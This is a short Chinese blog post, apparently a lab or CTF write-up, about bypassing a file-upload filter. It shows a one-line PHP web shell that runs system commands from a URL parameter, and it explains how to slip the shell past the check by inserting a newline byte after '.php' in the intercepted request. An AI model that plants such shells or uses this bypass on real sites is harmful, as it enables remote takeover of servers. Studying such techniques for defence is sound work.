Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
wAEWQ6Ib79 分钟前
当今互联网安全的基石 - TLS/SSL咖喱o14 分钟前
ISISwhite-persist17 分钟前
【vulhub weblogic CVE-2017-10271漏洞复现】vulhub weblogic CVE-2017-10271漏洞复现详细解析Strange_Head25 分钟前
《Linux系统网络协议》用 C 语言写一个最小 HTTP Server 与 Client——网络篇KhalilRuan34 分钟前
什么是KCP?QUIC?Websocket?Arva .1 小时前
RabbitMQkim_puppy1 小时前
TCP的三次握手,四次挥手m0_738120721 小时前
网络安全编程——开发一个TCP代理Python实现(二)Rsun045511 小时前
ConfigurableListableBeanFactory跟ApplicationContext作用童话的守望者2 小时前
应急响应靶机练习-Web2